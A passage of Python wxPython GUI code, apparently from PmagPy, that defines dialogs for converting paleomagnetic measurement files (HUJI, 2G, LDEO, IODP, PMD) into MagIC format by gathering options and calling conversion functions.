self.bSizer5.return_value()\n options['samp_con'] = ncn\n loc_name = self.bSizer6.return_value()\n options['location'] = loc_name\n if loc_name:\n loc_name = '-loc ' + loc_name\n #peak_AF = self.bSizer7.return_value()\n #options['peakfield'] = peak_AF\n\n replicate = self.bSizer8.return_value()\n if replicate:\n options['noave'] = 0\n replicate = ''\n else:\n options['noave'] = 1\n replicate = '-A'\n\n COMMAND = \"huji_magic_new.py -f {} -fd {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} {} -LP {} {} -ncn {} {} {} {}\".format(HUJI_file, dat_file, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, user, experiment_type, loc_name, ncn, lab_field, spc, replicate)\n program_ran, error_message = convert.huji(**options)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.huji.__doc__)\n\n\nclass convert_2g_binary_files_to_MagIC(convert_files_to_MagIC):\n\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"Folder containing one or more 2g-binary format files\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n #self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n self.bSizer0 = pw.choose_dir(pnl, btn_text = 'add', method = self.on_add_dir_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 2 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name', 'Site is entered under a separate column', '[XXXX]YYY where XXXX is the site name, enter number of X']\n self.bSizer2 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 3 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer3 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_specimen_ocn(pnl)\n\n #---sizer 5 ----\n TEXT=\"Location name:\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ---\n TEXT=\"Instrument name (optional):\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n\n #---sizer 8 ----\n self.bSizer8 = pw.site_lat_lon(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl) # creates ok, cancel, help buttons and binds them to appropriate methods\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n #---button methods ---\n\n def on_okButton(self, event):\n 
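# note (added comment): this handler loops over every .dat/.DAT file in the chosen\n # directory and only opens the results window after the last file converts\n # (see the files.index(f) check in the loop below)\n 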
os.chdir(self.WD)\n options_dict = {}\n WD = self.WD\n options_dict['dir_path'] = WD\n directory = self.bSizer0.return_value()\n options_dict['input_dir'] = directory\n if not directory:\n pw.simple_warning('You must select a directory containing 2g binary files')\n return False\n files = os.listdir(directory)\n files = [str(f) for f in files if str(f).endswith('.dat') or str(f).endswith('.DAT')]\n if not files:\n pw.simple_warning('No .dat files found in {}'.format(directory))\n return False\n ID = \"-ID \" + directory\n if self.bSizer1.return_value():\n particulars = self.bSizer1.return_value()\n options_dict['gmeths'] = particulars\n mcd = '-mcd ' + particulars\n else:\n mcd = ''\n ncn = self.bSizer2.return_value()\n options_dict['samp_con'] = ncn\n spc = self.bSizer3.return_value()\n options_dict['specnum'] = spc or 0\n if not spc:\n spc = '-spc 1'\n else:\n spc = '-spc ' + spc\n ocn = self.bSizer4.return_value()\n options_dict['or_con'] = ocn\n loc_name = self.bSizer5.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n try: lat,lon = self.bSizer8.return_value().split()\n except ValueError: lat,lon = '',''\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n instrument = self.bSizer6.return_value()\n options_dict['inst'] = instrument\n if instrument:\n instrument = \"-ins \" + instrument\n replicate = self.bSizer7.return_value()\n if replicate:\n replicate = '-a'\n options_dict['noave'] = 0\n else:\n replicate = ''\n options_dict['noave'] = 1\n for f in files:\n file_2g_bin = f\n outfile = file_2g_bin + \".magic\"\n options_dict['meas_file'] = outfile\n options_dict['mag_file'] = f\n spec_outfile = file_2g_bin + \"_specimens.txt\"\n samp_outfile = file_2g_bin + \"_samples.txt\"\n site_outfile = file_2g_bin + \"_sites.txt\"\n loc_outfile = file_2g_bin + \"_locations.txt\"\n options_dict['spec_file'] = spec_outfile\n options_dict['samp_file'] = samp_outfile\n options_dict['site_file'] = site_outfile\n options_dict['loc_file'] = loc_outfile\n COMMAND = \"_2g_bin_magic.py -WD {} -f {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} -ncn {} {} {} -ocn {} {} {} {} {} -lat {} -lon {}\".format(WD, file_2g_bin, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, ncn, mcd, spc, ocn, loc_name, replicate, ID, instrument,lat,lon)\n if files.index(f) == (len(files) - 1): # terminate process on last file call\n # to run as module:\n if convert._2g_bin(**options_dict):\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning()\n\n else:\n print(\"Running equivalent of python command: \", COMMAND)\n if convert._2g_bin(**options_dict):\n pass # success, continue on to next file\n else:\n pw.simple_warning()\n\n def on_helpButton(self, event):\n # to run as module:\n pw.on_helpButton(text=convert._2g_bin.__doc__)\n\n # to run as command line:\n #pw.on_helpButton(\"_2g_bin_magic.py -h\")\n\n\nclass convert_2g_ascii_files_to_MagIC(convert_files_to_MagIC):\n\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"Folder containing one or more 2g-ascii format files\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n #self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n self.bSizer0 = pw.choose_dir(pnl, btn_text = 'add', method = self.on_add_dir_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 2 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter 
number of Y', 'sample name=site name', 'Site is entered under a separate column', '[XXXX]YYY where XXXX is the site name, enter number of X']\n self.bSizer2 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 3 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer3 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_specimen_ocn(pnl)\n\n #---sizer 5 ----\n TEXT=\"Location name:\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ---\n TEXT=\"Instrument name (optional):\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n\n #---sizer 8 ----\n self.bSizer8 = pw.site_lat_lon(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl) # creates ok, cancel, help buttons and binds them to appropriate methods\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n #---button methods ---\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n WD = self.WD\n options_dict['dir_path'] = WD\n directory = self.bSizer0.return_value()\n options_dict['input_dir'] = directory\n if not directory:\n pw.simple_warning('You must select a directory containing 2g ascii files')\n return False\n files = os.listdir(directory)\n files = [str(f) for f in files if str(f).endswith('.asc') or str(f).endswith('.ASC')]\n if not files:\n pw.simple_warning('No .asc files found in {}'.format(directory))\n return False\n ID = \"-ID \" + directory\n if self.bSizer1.return_value():\n particulars = self.bSizer1.return_value()\n options_dict['gmeths'] = particulars\n mcd = '-mcd ' + particulars\n else:\n mcd = ''\n ncn = self.bSizer2.return_value()\n options_dict['samp_con'] = ncn\n spc = self.bSizer3.return_value()\n options_dict['specnum'] = spc or 0\n if not spc:\n spc = '-spc 1'\n else:\n spc = '-spc ' + spc\n ocn = self.bSizer4.return_value()\n options_dict['or_con'] = ocn\n loc_name = self.bSizer5.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n try: lat,lon = self.bSizer8.return_value().split()\n except ValueError: lat,lon = '',''\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n instrument = self.bSizer6.return_value()\n options_dict['inst'] = instrument\n if instrument:\n instrument = \"-ins \" + instrument\n replicate = self.bSizer7.return_value()\n if replicate:\n replicate = '-a'\n options_dict['noave'] = 0\n else:\n replicate = ''\n options_dict['noave'] = 1\n for f in files:\n file_2g_asc = f\n outfile = file_2g_asc + 
\".magic\"\n options_dict['meas_file'] = outfile\n options_dict['mag_file'] = f\n spec_outfile = file_2g_asc + \"_specimens.txt\"\n samp_outfile = file_2g_asc + \"_samples.txt\"\n site_outfile = file_2g_asc + \"_sites.txt\"\n loc_outfile = file_2g_asc + \"_locations.txt\"\n options_dict['spec_file'] = spec_outfile\n options_dict['samp_file'] = samp_outfile\n options_dict['site_file'] = site_outfile\n options_dict['loc_file'] = loc_outfile\n COMMAND = \"_2g_asc_magic.py -WD {} -f {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} -ncn {} {} {} -ocn {} {} {} {} {} -lat {} -lon {}\".format(WD, file_2g_asc, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, ncn, mcd, spc, ocn, loc_name, replicate, ID, instrument,lat,lon)\n if files.index(f) == (len(files) - 1): # terminate process on last file call\n # to run as module:\n if convert._2g_asc(**options_dict):\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning()\n\n else:\n print(\"Running equivalent of python command: \", COMMAND)\n if convert._2g_asc(**options_dict):\n pass # success, continue on to next file\n else:\n pw.simple_warning()\n\n def on_helpButton(self, event):\n # to run as module:\n pw.on_helpButton(text=convert._2g_bin.__doc__)\n\n # to run as command line:\n #pw.on_helpButton(\"_2g_asc_magic.py -h\")\n\nclass convert_LDEO_files_to_MagIC(convert_files_to_MagIC):\n\n \"\"\" \"\"\"\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"LDEO format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 2 ---\n exp_names=['AF Demag', 'Thermal (includes thellier but not trm)', 'Shaw method', 'IRM (acquisition)', 'NRM only', 'TRM acquisition', 'double AF demag', 'triple AF demag (GRM protocol)', 'Anisotropy experiment']\n self.bSizer2 = pw.experiment_type(pnl, exp_names)\n\n #---sizer 2a ---\n # add conditional boxsizer for Shaw experiments\n # if arm_labfield and trm_peakT are properly added into ldeo_magic\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_ncn(pnl)\n\n #---sizer 5 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ---\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 8 ---\n self.bSizer8 = pw.replicate_measurements(pnl)\n\n #---sizer 9 ----\n TEXT = \"peak AF field (mT) if ARM: \"\n self.bSizer9 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 10 ---\n TEXT = \"Coil number for ASC impulse coil (if treatment units in Volts): \"\n self.bSizer10 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 11 ---\n self.bSizer11 = pw.mass_or_volume_buttons(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n hbox0 = wx.BoxSizer(wx.HORIZONTAL)\n hbox0.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.RIGHT, border=5)\n hbox1 = wx.BoxSizer(wx.HORIZONTAL)\n hbox1.Add(self.bSizer9, flag=wx.ALIGN_LEFT|wx.RIGHT, border=5)\n hbox1.Add(self.bSizer10, flag=wx.ALIGN_LEFT)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer11, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, 
flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hbox0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hbox1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER|wx.BOTTOM, border=20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n LDEO_file = self.bSizer0.return_value()\n if not LDEO_file:\n pw.simple_warning(\"You must provide a LDEO format file\")\n return False\n options_dict['magfile'] = LDEO_file\n magicoutfile=os.path.split(LDEO_file)[1]+\".magic\"\n outfile=os.path.join(self.WD, magicoutfile)\n options_dict['meas_file'] = outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_specimens.txt\"\n spec_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['spec_file'] = spec_outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_samples.txt\"\n samp_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['samp_file'] = samp_outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_sites.txt\"\n site_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['site_file'] = site_outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_locations.txt\"\n loc_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['loc_file'] = loc_outfile\n experiment_type = self.bSizer2.return_value()\n options_dict['codelist'] = experiment_type\n if experiment_type:\n experiment_type = \"-LP \" + experiment_type\n lab_field = self.bSizer3.return_value()\n if lab_field:\n options_dict['labfield'], options_dict['phi'], options_dict['theta'] = lab_field.split()\n lab_field = \"-dc \" + lab_field\n ncn = self.bSizer4.return_value()\n options_dict['samp_con'] = ncn\n spc = self.bSizer5.return_value()\n options_dict['specnum'] = spc or 0\n if spc:\n spc = \"-spc \" + spc\n else:\n spc = \"-spc 0\"\n loc_name = self.bSizer6.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n replicate = self.bSizer8.return_value()\n if replicate:\n replicate = \"\"\n options_dict['noave'] = 0 # do average\n else:\n replicate = \"-A\"\n options_dict['noave'] = 1 # don't average\n AF_field = self.bSizer9.return_value()\n options_dict['peakfield'] = AF_field or 0\n if AF_field:\n AF_field = \"-ac \" + AF_field\n coil_number = self.bSizer10.return_value()\n options_dict['coil'] = coil_number\n if coil_number:\n coil_number = \"-V \" + coil_number\n mv = self.bSizer11.return_value()\n options_dict['mass_or_vol'] = mv\n COMMAND = \"ldeo_magic.py -f {0} -F {1} -Fsp {2} -Fsa {3} -Fsi {4} -Flo {5} {6} {7} -ncn {8} {9} {10} {11} {12} {13} -mv {14}\".format(LDEO_file, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, experiment_type, lab_field, ncn, spc, loc_name, replicate, AF_field, coil_number, mv)\n # to run as module:\n program_ran, error_message = convert.ldeo(**options_dict)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.ldeo.__doc__)\n\n\nclass convert_IODP_files_to_MagIC(convert_files_to_MagIC):\n\n \"\"\" \"\"\"\n\n def InitUI(self):\n\n pnl = 
self.panel\n\n TEXT = \"IODP format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0a ---\n TEXT = \"IODP file type\"\n self.bSizer0a = pw.radio_buttons(pnl, ['SRM discrete', 'SRM section', 'JR6', 'KLY4S'], \"Format: \", wx.HORIZONTAL)\n self.Bind(wx.EVT_RADIOBUTTON, self.on_switch_format)\n\n #self.bSizer0a = pw.labeled_yes_or_no(pnl, TEXT, label1, label2)\n #self.Bind(wx.EVT_RADIOBUTTON, self.on_switch_format, self.bSizer0a.rb1)\n #self.Bind(wx.EVT_RADIOBUTTON, self.on_switch_format, self.bSizer0a.rb2)\n\n #---sizer 0b ---\n TEXT = \"If you haven't already imported a samples data file from LIMS, please do so below!\\nThis is required to complete the SRM discrete import.\"\n self.bSizer0b = pw.simple_text(pnl, TEXT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.site_lat_lon(pnl)\n\n #---sizer 2 ----\n self.bSizer2 = pw.replicate_measurements(pnl)\n\n #---sizer 3 ----\n #self.bSizer1a = pw.labeled_text_field(pnl, 'Specimen volume, default is 12 cc.\\nPlease provide volume in cc.')\n self.bSizer3 = pw.labeled_text_field(pnl, 'Volume in cc, default is 7cc.')\n\n #---sizer 4 ---\n self.bSizer4 = pw.labeled_text_field(pnl, 'Depth Key, default is \"Depth CSF-B (m)\"')\n\n #---sizer 5 ---\n self.bSizer5 = pw.choose_file(pnl, 'add', method = self.on_add_samples_button,\n text=\"IODP samples data file downloaded from LIMS\")\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0b, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.AddSpacer(10)\n #vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n # grey out what isn't initially needed\n self.bSizer3.text_field.Disable()\n self.bSizer3.label.SetForegroundColour((190, 190, 190))\n self.bSizer4.text_field.Disable()\n self.bSizer4.label.SetForegroundColour((190, 190, 190))\n\n\n self.hbox_all = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.AddSpacer(20)\n self.hbox_all.Add(vbox)\n self.hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(self.hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n wait = wx.BusyInfo(\"Please wait, working...\\nFor large files, this may take a few minutes\")\n wx.SafeYield()\n wd = self.WD\n full_file = self.bSizer0.return_value()\n ID, IODP_file = os.path.split(full_file)\n if not ID:\n ID = '.'\n fmt = self.bSizer0a.return_value()\n if not IODP_file:\n article = \"an\" if fmt[0] == \"S\" else \"a\"\n pw.simple_warning(\"You must provide {} {} file to convert\".format(article, fmt))\n return\n outfile = IODP_file + \".magic\"\n spec_outfile = IODP_file[:IODP_file.find('.')] + 
\"_specimens.txt\"\n samp_outfile = IODP_file[:IODP_file.find('.')] + \"_samples.txt\"\n site_outfile = IODP_file[:IODP_file.find('.')] + \"_sites.txt\"\n loc_outfile = IODP_file[:IODP_file.find('.')] + \"_locations.txt\"\n replicate = self.bSizer2.return_value()\n if replicate: # do average\n noave = 0\n else: # don't average\n noave = 1\n try: lat,lon = self.bSizer1.return_value().split()\n except ValueError: lat,lon = '',''\n volume = self.bSizer3.return_value()\n if not volume and fmt != 'KLY4S':\n volume = 7\n comp_depth_key = self.bSizer4.return_value()\n dc_field = self.bSizer4.return_value()\n instrument = self.bSizer4.return_value()\n samp_infile = self.bSizer5.return_value()\n\n # if sample file is available, run that conversion first\n if samp_infile:\n program_ran, error_message = convert.iodp_samples_csv(samp_infile)\n if program_ran:\n print('-I- samples are read in')\n else:\n print('-W ', error_message)\n pw.simple_warning(\"Couldn't read in {}. Trying to continue with next step.\".format(samp_infile))\n\n if fmt == 'SRM section': # SRM section\n COMMAND = \"convert.iodp_srm_lore({}, {}, {}, noave={}, comp_depth_key={}, meas_file={}, lat={}, lon={})\".format(IODP_file, wd, ID, noave, comp_depth_key, outfile, lat, lon)\n program_ran, error_message = convert.iodp_srm_lore(IODP_file, wd, ID, noave=noave,\n comp_depth_key=comp_depth_key,\n meas_file=outfile,\n lat=lat, lon=lon)\n elif fmt == 'SRM discrete': # SRM discrete\n COMMAND = \"convert.iodp_dscr_lore({}, dir_path={}, input_dir_path={}, volume={}, noave={}, meas_file={}, spec_file='specimens.txt')\".format(IODP_file, wd, ID, volume, noave, outfile)\n # check for needed specimens file\n if not os.path.exists(os.path.join(wd, \"specimens.txt\")):\n pw.simple_warning(\"You need to provide an IODP samples data file\")\n return\n program_ran, error_message = convert.iodp_dscr_lore(IODP_file, dir_path=wd,\n input_dir_path=ID, volume=volume, noave=noave,\n meas_file=outfile, spec_file=\"specimens.txt\")\n\n elif fmt == \"JR6\":\n COMMAND = \"convert.iodp_jr6_lore({}, dir_path={}, input_dir_path={}, volume={}, noave={}, dc_field={}, meas_file={}, spec_file='specimens.txt')\".format(IODP_file, wd, ID, volume, noave, dc_field, outfile)\n program_ran, error_message = convert.iodp_jr6_lore(IODP_file, dir_path=wd,\n input_dir_path=ID, volume=volume, noave=noave,\n dc_field=dc_field,\n meas_file=outfile, spec_file=\"specimens.txt\")\n\n print(\"convert JR6\")\n\n elif fmt == \"KLY4S\":\n COMMAND = \"convert.iodp_kly4s_lore({}, meas_out={}, spec_infile='specimens.txt', spec_out='kly4s_specimens.txt', instrument={}, actual_volume={}, dir_path={}, input_dir_path={})\".format(IODP_file, outfile, instrument, volume, wd, ID)\n program_ran, error_message = convert.iodp_kly4s_lore(IODP_file, meas_out=outfile, spec_infile='specimens.txt',\n spec_out='kly4s_specimens.txt', instrument=instrument,\n actual_volume=volume, dir_path=wd, input_dir_path=ID)\n print(\"convert KLY4S\")\n\n print(COMMAND)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n\n del wait\n\n def on_switch_format(self, event):\n fmt = self.bSizer0a.return_value()\n if fmt == \"SRM section\":\n self.bSizer0b.static_text.SetLabel(\"Please provide Depth key and Volume below.\\nYou may optionally provide a samples data file.\")\n self.bSizer3.label.SetLabel('Volume in cc, default is 7cc.')\n self.bSizer3.text_field.Enable()\n self.bSizer3.label.SetForegroundColour(wx.BLACK)\n self.bSizer4.label.SetLabel('Depth Key, default is 
\"Depth CSF-B (m)\"')\n self.bSizer4.text_field.Enable()\n self.bSizer4.label.SetForegroundColour(wx.BLACK)\n elif fmt == \"SRM discrete\":\n self.bSizer0b.static_text.SetLabel(\"If you haven't already imported a samples data file from LIMS, please do so below!\\nThis is required to complete the SRM discrete import.\")\n self.bSizer3.text_field.Disable()\n self.bSizer3.label.SetForegroundColour((190, 190, 190))\n self.bSizer4.text_field.Disable()\n self.bSizer4.label.SetForegroundColour((190, 190, 190))\n elif fmt == \"JR6\":\n self.bSizer0b.static_text.SetLabel(\"If you haven't already imported a samples data file from LIMS, please do so below!\\nThis is required to complete the JR6 import.\")\n self.bSizer3.label.SetLabel('Volume in cc, default is 7cc.')\n self.bSizer3.text_field.Enable()\n self.bSizer3.label.SetForegroundColour(wx.BLACK)\n self.bSizer4.label.SetLabel('DC field, default is 50e-6 ')\n self.bSizer4.text_field.Enable()\n self.bSizer4.label.SetForegroundColour(wx.BLACK)\n elif fmt == \"KLY4S\":\n self.bSizer0b.static_text.SetLabel(\"Please provide Instrument name and actual specimen volume below (if known).\\nIf you haven't already imported a samples data file from LIMS, please do so below!\")\n self.bSizer3.label.SetLabel(\"Actual specimen volume\")\n self.bSizer3.text_field.Enable()\n self.bSizer3.label.SetForegroundColour(wx.BLACK)\n self.bSizer4.label.SetLabel('Instrument name, default is IODP-KLY4S ')\n self.bSizer4.text_field.Enable()\n self.bSizer4.label.SetForegroundColour(wx.BLACK)\n\n\n self.hbox_all.Fit(self)\n\n\n def on_add_samples_button(self, event):\n text = \"choose sample file downloaded from LIMS\"\n pw.on_add_file_button(self.bSizer5, text)\n\n\n def on_helpButton(self, event):\n fmt = self.bSizer0a.return_value()\n if fmt == 'SRM section':\n pw.on_helpButton(text=convert.iodp_srm_lore.__doc__)\n elif fmt == 'SRM discrete':\n pw.on_helpButton(text=convert.iodp_dscr_lore.__doc__)\n elif fmt == 'JR6':\n pw.on_helpButton(text=convert.iodp_jr6_lore.__doc__)\n elif fmt == 'KLY4S':\n pw.on_helpButton(text=convert.iodp_kly4s_lore.__doc__)\n\n\n\nclass convert_PMD_files_to_MagIC(convert_files_to_MagIC):\n \"\"\" \"\"\"\n\n def InitUI(self):\n pnl = self.panel\n\n TEXT = \"Folder containing one or more PMD format files\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_dir(pnl, 'add', method = 